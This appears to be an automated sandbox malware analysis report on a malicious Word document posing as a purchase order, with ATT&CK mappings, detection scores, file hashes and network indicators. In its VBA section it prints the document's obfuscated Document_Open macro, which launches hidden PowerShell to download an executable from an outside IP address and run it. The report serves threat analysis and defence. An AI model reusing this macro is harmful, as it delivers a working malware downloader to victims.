Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
RFL_PO 69002.doc15%VirustotalBrowse
RFL_PO 69002.doc22%ReversingLabsScript-Macro.Downloader.EncDoc
RFL_PO 69002.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://31.210.20.45/1xBet/RFL_0769002.exe7%VirustotalBrowse
http://31.210.20.45/1xBet/RFL_0769002.exe0%Avira URL Cloudsafe
http://31.210.20.45/1xBet/RFL_0769002.ex0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://31.210.20.45/1xBet/RFL_0769002.exe2.exe0%Avira URL Cloudsafe
http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC:0%Avira URL Cloudsafe
http://31.210.20.45/1xBet/RFL_0769002.ex90%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://31.210.20.45/1xBet/RFL_0769002.exepowershell.exe, 00000002.00000002.2068494713.00000000000E0000.00000004.00000020.sdmptrue
  • 7%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://31.210.20.45/1xBet/RFL_0769002.exRFL_PO 69002.doctrue
  • Avira URL Cloud: safe
unknown
http://www.%s.comPApowershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmpfalse
    high
    http://31.210.20.45/1xBet/RFL_0769002.exe2.exepowershell.exe, 00000002.00000002.2068535215.0000000000169000.00000004.00000020.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC:powershell.exe, 00000002.00000002.2068560577.0000000000193000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.2068695436.0000000000374000.00000004.00000040.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://31.210.20.45/1xBet/RFL_0769002.ex9RFL_PO 69002.docfalse
    • Avira URL Cloud: safe
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    31.210.20.45
    unknownNetherlands
    61157PLUSSERVER-ASN1DEtrue

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:433026
    Start date:11.06.2021
    Start time:07:35:25
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 27s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:RFL_PO 69002.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal84.expl.winDOC@3/6@0/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .doc
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtQueryAttributesFile calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    07:35:31API Interceptor5x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    31.210.20.45BL & INV.docGet hashmaliciousBrowse
    • 31.210.20.45/1xBet/Corf4olpp3.exe
    Swift MT103 Transfer.xlsxGet hashmaliciousBrowse
    • 31.210.20.45/10/nanno1.exe
    IMG_1741000.xlsxGet hashmaliciousBrowse
    • 31.210.20.45/10/11222.exe

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    PLUSSERVER-ASN1DESKlGhwkzTi.exeGet hashmaliciousBrowse
    • 151.106.118.75
    BL & INV.docGet hashmaliciousBrowse
    • 31.210.20.45
    BL & INV.docGet hashmaliciousBrowse
    • 31.210.20.45
    BL & INV.docGet hashmaliciousBrowse
    • 31.210.20.45
    8cuLxttsra.exeGet hashmaliciousBrowse
    • 31.210.21.161
    Owbtvvu.exeGet hashmaliciousBrowse
    • 31.210.20.60
    Inqquuirrryyy202106079768900100.exeGet hashmaliciousBrowse
    • 31.210.21.188
    Swift MT103 Transfer.xlsxGet hashmaliciousBrowse
    • 31.210.20.45
    inqqqqquiry9867120210406000900.exeGet hashmaliciousBrowse
    • 31.210.21.188
    tzeEeC2CBA.exeGet hashmaliciousBrowse
    • 151.106.118.75
    IMG_1741000.xlsxGet hashmaliciousBrowse
    • 31.210.20.45
    QyKNw7NioL.exeGet hashmaliciousBrowse
    • 151.106.118.75
    fMWJqYA8ae.exeGet hashmaliciousBrowse
    • 151.106.118.75
    Compliance - Notice 06-03.xlsxGet hashmaliciousBrowse
    • 151.106.118.75
    Request for Courtesy Call - Urgent.xlsxGet hashmaliciousBrowse
    • 151.106.118.75
    Payment Advice Reference No SWT005262021.exeGet hashmaliciousBrowse
    • 31.210.20.60
    Payment Advice Reference0000 docx.exeGet hashmaliciousBrowse
    • 31.210.20.60
    BVYzIQc9Q3.exeGet hashmaliciousBrowse
    • 31.210.21.63
    9XfX7aaf3F.exeGet hashmaliciousBrowse
    • 151.106.118.75
    xhbUdeAoVP.exeGet hashmaliciousBrowse
    • 151.106.118.75

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B00F2CD-537D-406E-B057-1B1541B1D39D}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFL_PO 69002.LNK
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Fri Jun 11 13:35:28 2021, length=428544, window=hide
    Category:dropped
    Size (bytes):2048
    Entropy (8bit):4.534020161128856
    Encrypted:false
    SSDEEP:24:8xI/XTwz6IkneeTiDv3qm1dM7dD2xI/XTwz6IkneeTiDv3qm1dM7dV:8e/XT3IkesgQh2e/XT3IkesgQ/
    MD5:2455AC4DF52F797740DEC91D5F3C1AB5
    SHA1:7CDE8C4527A05226D74EB0261FF01BBFBE54CDE6
    SHA-256:2DF13092BA870E6622E771E7F7D2D980413CA05F5A51241D14CED360483AFCFC
    SHA-512:364A97DAC69642E0C72B64B7B83CC3E372F820B8D262B1B3E617EA3FBB9D900E74453893F1FD98F5D19B594886DC28140D653F58F54DB22030CA5724BBE6D0C9
    Malicious:false
    Reputation:low
    Preview: L..................F.... ....i..{...i..{....P..^...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2......Rot .RFL_PO~1.DOC..N.......Q.y.Q.y*...8.....................R.F.L._.P.O. .6.9.0.0.2...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\RFL_PO 69002.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.L._.P.O. .6.9.0.0.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......980108..........D_....3N...W...9F.C...........[D_....3N...W
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):74
    Entropy (8bit):4.33010311570589
    Encrypted:false
    SSDEEP:3:M1w3pUlvQ13pUlmX1w3pUlv:MG3a9g3az3a1
    MD5:9B3055E12C4A9B6B0C8419746014048D
    SHA1:1441C0E1618E5C698EA50292509710036EBEDCAC
    SHA-256:C5696759D40368FD4CEF825F47831F2BBE3A0151AA60B75741286802C236D569
    SHA-512:105D4B682EAE59F6D1212680E5035EBB88780922A6492CFD1FAB291EEF9F21C1B9ECC0E5BDCFA35B4298465E22CE48CDAE7631FE2733260DA5AD2F53161E1ECA
    Malicious:false
    Reputation:low
    Preview: [doc]..RFL_PO 69002.LNK=0..RFL_PO 69002.LNK=0..[doc]..RFL_PO 69002.LNK=0..
    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.431160061181642
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
    Malicious:false
    Reputation:high, very likely benign file
    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I7C5FUJQ0Y2PXWT9C5J1.temp
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):8016
    Entropy (8bit):3.5831418784386364
    Encrypted:false
    SSDEEP:96:chQCsMq9qvsqvJCwoqz8hQCsMq9qvsEHyqvJCworAzkCYmHRf8RclUV0Iu:cyEoqz8yQHnorAzkaf8RMIu
    MD5:AE7F4F39A8FB3D1513F9CBA8587E85F4
    SHA1:6A111BF9B998A9BD2796ED34621D5397E088ECF3
    SHA-256:A533B3DF7EC827E302410D7A5A22D281AA47136D33DA83DE44010FCDD391DDC9
    SHA-512:6316B6B68A31DE8AAD6B91E98092285B53D928685D1996DBB637073D9D35FBC9973970D92195F226F116A33F1B37A84E835167FE9807043B66B85A5F7F73AD3A
    Malicious:false
    Reputation:low
    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
    C:\Users\user\Desktop\~$L_PO 69002.doc
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.431160061181642
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
    Malicious:false
    Reputation:high, very likely benign file
    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Template: Normal.dotm, Last Saved By: Dell, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Jun 10 09:54:00 2021, Last Saved Time/Date: Thu Jun 10 09:55:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
    Entropy (8bit):7.856503203160727
    TrID:
    • Microsoft Word document (32009/1) 54.23%
    • Microsoft Word document (old ver.) (19008/1) 32.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
    File name:RFL_PO 69002.doc
    File size:426496
    MD5:ee4431e2c986dcac3fc8078c674ba65e
    SHA1:64aa75122963e38f52739ba819788e4bfcfb3651
    SHA256:4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
    SHA512:6de5ce6da2e111931a2dc40ded7b23c2754503b4340b0492ce68ff0480b0e3727f0697a1772ef106e194194e9e0d96916efe6296e8963819544d2d2effdfb618
    SSDEEP:12288:hlhcQMEUElwvXxKDe2YqREMm1vRm3d+QxHd5NK:vXUvvXSe27etQ3dv9m
    File Content Preview:........................>.......................-...........0...............&...'...(...)...*...+...,..........................................................................................................................................................

    File Icon

    Icon Hash:e4eea2aaa4b4b4a4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "RFL_PO 69002.doc"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Office Word
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1252
    Title:
    Subject:
    Author:Dell
    Keywords:
    Comments:
    Template:Normal.dotm
    Last Saved By:Dell
    Revion Number:5
    Total Edit Time:60
    Create Time:2021-06-10 08:54:00
    Last Saved Time:2021-06-10 08:55:00
    Number of Pages:1
    Number of Words:0
    Number of Characters:1
    Creating Application:Microsoft Office Word
    Security:0

    Document Summary

    Document Code Page:1252
    Number of Lines:1
    Number of Paragraphs:1
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:983040

    Streams with VBA

    VBA File Name: Module1.bas, Stream Size: 993
    General
    Stream Path:Macros/VBA/Module1
    VBA File Name:Module1.bas
    Stream Size:993
    Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ab 34 9c e4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    physicaldark()
    Attribute
    VB_Name
    Macro
    physicaldark
    VBA Code
    Attribute VB_Name = "Module1"
    Sub physicaldark()
    '
    ' physicaldark Macro
    ' 1Y9EPHD78LD1
    '
    End Sub
    VBA File Name: ThisDocument.cls, Stream Size: 1786
    General
    Stream Path:Macros/VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:1786
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . 4 . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 0b 03 00 00 2b 05 00 00 00 00 00 00 01 00 00 00 ab 34 d7 47 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    ";C:\Users\Public\Documents\nothinglittle.ex"
    -Destination
    "C:\Users\Public\Documents\nothinglittle.ex"
    VB_Name
    VB_Creatable
    CreateObject("wscript.s"
    VB_Exposed
    calllife).Run(insidewith
    rememberhead
    Start-Bit"
    "hell"
    VB_Customizable
    -Source
    "Transfer
    insidewith
    Document_Open()
    VB_TemplateDerived
    "ThisDocument"
    False
    Attribute
    Private
    VB_PredeclaredId
    VB_GlobalNameSpace
    "powers"
    VB_Base
    calllife
    VBA Code
    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    insidewith = "powers"
    calllife = "hell"
    rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
    End Sub

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
    General
    Stream Path:\x1CompObj
    File Type:data
    Stream Size:114
    Entropy:4.2359563651
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.243799209562
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.45311151175
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
    Stream Path: 1Table, File Type: data, Stream Size: 6987
    General
    Stream Path:1Table
    File Type:data
    Stream Size:6987
    Entropy:5.8885032044
    Base64 Encoded:True
    Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
    Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
    Stream Path: Data, File Type: data, Stream Size: 392814
    General
    Stream Path:Data
    File Type:data
    Stream Size:392814
    Entropy:7.9926896989
    Base64 Encoded:True
    Data ASCII:n . . . D . d . . . . . . . . . . . . . . . . . . . . . . . x " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . C . . . & . . . . A . . . . . . . . . . . . . . . . . . . . . . 0 . 1 . 0 . 1 . 0 . 1 . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . = . . . z . . . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . . . . . = . . . z . . . . . . P N G . . . . . . . . I H D R . . . . . . . L . . . . . } . . . . . . .
